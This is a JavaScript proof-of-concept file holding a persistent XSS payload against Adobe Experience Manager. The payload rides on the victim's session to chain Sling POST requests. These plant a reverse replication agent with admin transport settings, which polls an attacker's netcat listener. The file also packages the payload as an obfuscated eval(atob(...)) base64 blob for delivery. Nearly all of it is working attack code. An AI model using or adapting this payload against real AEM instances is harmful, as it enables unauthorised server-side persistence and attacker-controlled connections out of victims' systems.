Demonstration payload for a persistent XSS in AEM (Adobe Experience Manager): it creates a reverse replication agent on the AEM instance that then talks to a fake AEM server (e.g. a netcat listener).
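/**
 * Demonstration payload: persistent XSS in AEM that installs a reverse
 * replication agent.
 *
 * The snippet runs in the victim's browser against the AEM instance that
 * served the page. All URLs are relative, so the requests ride on the victim's
 * session (presumably an account with write access to /content and
 * /etc/replication). It issues three Sling POSTs, strictly in order:
 *   1. create a staging page node under /content/rce,
 *   2. write the agent properties into that node's jcr:content,
 *   3. copy the node into /etc/replication/agents.publish, where AEM treats
 *      it as a replication agent.
 *
 * The agent itself runs on the AEM server, not in the browser, and polls
 * LISTENER_URI. To watch the requests it issues, run a listener such as
 *   netcat -nvlp 8888
 * NOTE: "localhost" in LISTENER_URI is resolved by the AEM server, so the
 * listener only gets hit when it runs on the same host as AEM; otherwise use
 * a host the server can reach.
 *
 * transportPassword is in AEM's encrypted-property format ({...}). It is
 * presumably bound to the crypto key of the instance that produced it and
 * has to be regenerated for any other target — TODO confirm.
 *
 * Packaging: wrap the snippet with btoa(...) and deliver it as
 * eval(atob("...")). The encoded blob must be regenerated whenever this
 * readable snippet changes.
 *
 * The steps are chained on the jQuery XHR promises instead of fixed timers,
 * so a slow instance cannot make step 2 or 3 run before its parent exists.
 * Assumes jQuery >= 1.8 (.then returns a chainable promise).
 */
(function () {
  'use strict';

  // Node used to stage the agent configuration before it is copied into place.
  var STAGING_PATH = '/content/rce/portal-to-toom';
  // Final agent location; note the copy also renames the node (toom -> doom).
  var AGENT_PATH = '/etc/replication/agents.publish/portal-to-doom';
  // Endpoint the agent talks to; resolved from the AEM server's network.
  var LISTENER_URI = 'http://localhost:8888/reverseagent';

  // Properties of the reverse replication agent, written to jcr:content.
  var agentConfig = {
    'jcr:primaryType': 'nt:unstructured',
    'jcr:title': 'reverse-agent',
    'enabled': 'true',
    'transportUri': LISTENER_URI,
    'transportUser': 'admin',
    'reverseReplication': true,
    'cq:template': '/libs/cq/replication/templates/revagent',
    'retryDelay': '5000',
    'sling:resourceType': 'cq/replication/components/revagent',
    'transportPassword': '{25a0084936aae0469c1e8464fe1d75a3bd36f65a9d2c40628239eb3c2cc04972}'
  };

  /**
   * Sling POST to `url` with form-encoded `data`.
   * @param {string} url  target resource path
   * @param {Object} data properties / Sling operation parameters
   * @returns {jQuery.jqXHR} the request's promise
   */
  function post(url, data) {
    return $.ajax({ url: url, type: 'POST', data: data });
  }

  post(STAGING_PATH, { 'jcr:primaryType': 'cq:Page' })
    .then(function () {
      return post(STAGING_PATH + '/_jcr_content', agentConfig);
    })
    .then(function () {
      // :replace lets the demo be re-run if the agent already exists.
      return post(STAGING_PATH, {
        ':dest': AGENT_PATH,
        ':operation': 'copy',
        ':replace': 'true'
      });
    })
    .fail(function (xhr, status) {
      // Surface failures instead of silently continuing with a half-built agent.
      console.error('reverse-agent payload step failed:', status, xhr && xhr.status);
    });
}());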
/*
Base64 packaging. The btoa(...) call below yields the encoded form of the
snippet and eval(atob("...")) executes it in the victim's browser. The encoded
blob must be regenerated with btoa whenever the readable snippet above changes,
otherwise the two diverge.
btoa("$.ajax({url: '/content/rce/portal-to-toom',type: 'POST', data: {'jcr:primaryType':'cq:Page'}});setTimeout(function(){$.ajax({url: '/content/rce/portal-to-toom/_jcr_content',type: 'POST', data: {'jcr:primaryType': 'nt:unstructured','jcr:title': 'reverse-agent','enabled': 'true','transportUri': 'http://localhost:8888/reverseagent','transportUser': 'admin','reverseReplication': true,'cq:template': '/libs/cq/replication/templates/revagent','retryDelay': '5000','sling:resourceType': 'cq/replication/components/revagent','transportPassword': '{25a0084936aae0469c1e8464fe1d75a3bd36f65a9d2c40628239eb3c2cc04972}'}});setTimeout(function(){$.ajax({url: '/content/rce/portal-to-toom',type: 'POST', data: {':dest':'/etc/replication/agents.publish/portal-to-doom', ':operation':'copy', ':replace':'true'}});},3000)}, 3000);") | |
eval(atob("JC5hamF4KHt1cmw6ICcvY29udGVudC9yY2UvcG9ydGFsLXRvLXRvb20nLHR5cGU6ICdQT1NUJywgZGF0YTogeydqY3I6cHJpbWFyeVR5cGUnOidjcTpQYWdlJ319KTtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7JC5hamF4KHt1cmw6ICcvY29udGVudC9yY2UvcG9ydGFsLXRvLXRvb20vX2pjcl9jb250ZW50Jyx0eXBlOiAnUE9TVCcsIGRhdGE6IHsnamNyOnByaW1hcnlUeXBlJzogJ250OnVuc3RydWN0dXJlZCcsJ2pjcjp0aXRsZSc6ICdyZXZlcnNlLWFnZW50JywnZW5hYmxlZCc6ICd0cnVlJywndHJhbnNwb3J0VXJpJzogJ2h0dHA6Ly9sb2NhbGhvc3Q6ODg4OC9yZXZlcnNlYWdlbnQnLCd0cmFuc3BvcnRVc2VyJzogJ2FkbWluJywncmV2ZXJzZVJlcGxpY2F0aW9uJzogdHJ1ZSwnY3E6dGVtcGxhdGUnOiAnL2xpYnMvY3EvcmVwbGljYXRpb24vdGVtcGxhdGVzL3JldmFnZW50JywncmV0cnlEZWxheSc6ICc1MDAwJywnc2xpbmc6cmVzb3VyY2VUeXBlJzogJ2NxL3JlcGxpY2F0aW9uL2NvbXBvbmVudHMvcmV2YWdlbnQnLCd0cmFuc3BvcnRQYXNzd29yZCc6ICd7MjVhMDA4NDkzNmFhZTA0NjljMWU4NDY0ZmUxZDc1YTNiZDM2ZjY1YTlkMmM0MDYyODIzOWViM2MyY2MwNDk3Mn0nfX0pO3NldFRpbWVvdXQoZnVuY3Rpb24oKXskLmFqYXgoe3VybDogJy9jb250ZW50L3JjZS9wb3J0YWwtdG8tdG9vbScsdHlwZTogJ1BPU1QnLCBkYXRhOiB7JzpkZXN0JzonL2V0Yy9yZXBsaWNhdGlvbi9hZ2VudHMucHVibGlzaC9wb3J0YWwtdG8tZG9vbScsICc6b3BlcmF0aW9uJzonY29weScsICc6cmVwbGFjZSc6J3RydWUnfX0pO30sMzAwMCl9LCAzMDAwKTs=")) | |
*/